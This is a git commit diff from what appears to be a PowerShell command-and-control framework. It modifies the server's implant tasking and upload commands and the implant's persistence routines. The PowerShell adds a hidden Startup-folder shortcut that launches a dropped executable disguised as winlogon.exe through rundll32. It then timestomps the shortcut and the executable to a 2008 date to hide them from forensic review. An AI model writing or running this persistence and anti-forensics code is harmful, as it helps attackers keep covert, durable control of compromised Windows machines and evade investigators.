Updated InstallEXE-Persistence

chunking
benpturner 2018-08-09 10:40:35 +01:00
parent c5fd843a8e
commit 4f4b8610a2
3 changed files with 43 additions and 28 deletions

View File

@ -397,7 +397,15 @@ def runcommand(command, randomuri):
command = command.replace('sleep ', '')
command = command.replace('beacon ', '')
update_sleep(command, randomuri)
elif "searchhelp" in command.lower():
searchterm = (command.lower()).replace("searchhelp ","")
import string
helpfull = string.split(posh_help, '\n')
for line in helpfull:
if searchterm in line:
print line
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
startup()
@ -674,8 +682,10 @@ def runcommand(command, randomuri):
s = source_file.read()
source = base64.b64encode(s)
if s:
destination = (args.destination).replace("\\","\\\\")
uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (args.destination, source)
destination = args.destination.replace("\\","\\\\")
print ""
print "Uploading %s to %s" % (args.source, destination)
uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, source)
new_task(uploadcommand, randomuri)
except Exception as e:
print "Error with source file: %s" % e
@ -739,14 +749,6 @@ def runcommand(command, randomuri):
except Exception as e:
print "Error loading file: %s" % e
elif "searchhelp" in command.lower():
searchterm = (command.lower()).replace("searchhelp ","")
import string
helpfull = string.split(posh_help, '\n')
for line in helpfull:
if searchterm in line:
print line
elif "listmodules" in command.lower():
print os.listdir("%s/Modules/" % POSHDIR)

View File

@ -202,28 +202,40 @@ Function Install-Persistence
}
}
Function InstallExe-Persistence() {
$SourceEXE = "rundll32.exe"
$ArgumentsToSourceExe = "shell32.dll,ShellExec_RunDLL %temp%\winlogon.exe"
$DestinationPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WinLogon.lnk"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut($DestinationPath)
$Shortcut.TargetPath = $SourceEXE
$Shortcut.Arguments = $ArgumentsToSourceExe
$Shortcut.WindowStyle = 7
$Shortcut.Save()
TimeStomp $DestinationPath "01/03/2008 12:12 pm"
If ((Test-Path $DestinationPath) -and (Test-Path "$env:Temp\Winlogon.exe")) {
Write-Output "Created StartUp file Exe persistence: $DestinationPath"
if (Test-Path "$env:Temp\Winlogon.exe") {
$SourceEXE = "rundll32.exe"
$ArgumentsToSourceExe = "shell32.dll,ShellExec_RunDLL %temp%\winlogon.exe"
$DestinationPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WinLogon.lnk"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut($DestinationPath)
$Shortcut.TargetPath = $SourceEXE
$Shortcut.Arguments = $ArgumentsToSourceExe
$Shortcut.WindowStyle = 7
$Shortcut.Save()
TimeStomp $DestinationPath "01/03/2008 12:12 pm"
TimeStomp "$env:Temp\Winlogon.exe" "01/03/2008 12:12 pm"
If ((Test-Path $DestinationPath) -and (Test-Path "$env:Temp\Winlogon.exe")) {
Write-Output "Created StartUp file Exe persistence: $DestinationPath"
} else {
Write-Output "Error installing StartUp Exe persistence"
Write-Output "Upload EXE to $env:Temp\Winlogon.exe"
}
} else {
Write-Output "Error installing StartUp Exe persistence"
Write-Output "Upload EXE to $env:Temp\Winlogon.exe"
}
}
Function RemoveExe-Persistence() {
$DestinationPath1 = "$env:Temp\winlogon.exe"
Remove-Item -Force $DestinationPath1
If (Test-Path $DestinationPath1) {
Remove-Item -Force $DestinationPath1
}
$DestinationPath2 = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WinLogon.lnk"
Remove-Item -Force $DestinationPath2
TimeStomp $DestinationPath "01/03/2008 12:12 pm"
If (Test-Path $DestinationPath2) {
Remove-Item -Force $DestinationPath2
}
If ((Test-Path $DestinationPath1) -or ((Test-Path $DestinationPath2))) {
Write-Output "Unable to Remove Persistence"
} else {
@ -726,7 +738,7 @@ elseif ([IntPtr]::size -eq 4) {
}
}
Function TimeStomp($File, $Date) {
$file=(gi $file)
$file=(gi $file -force)
$file.LastWriteTime=$date;
$file.LastAccessTime=$date;
$file.CreationTime=$date;

View File

@ -16,8 +16,9 @@ def newTask(path):
for a in tasks:
command = a[2]
hostinfo = DB.get_hostinfo(RandomURI)
now = datetime.datetime.now()
print Colours.YELLOW,""
print "Command issued against implant %s on host %s %s" % (hostinfo[0],hostinfo[3],hostinfo[11])
print "Command issued against implant %s on host %s %s (%s)" % (hostinfo[0],hostinfo[3],hostinfo[11],now.strftime("%m/%d/%Y %H:%M:%S"))
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode64")) :
print "Loading Shellcode",Colours.END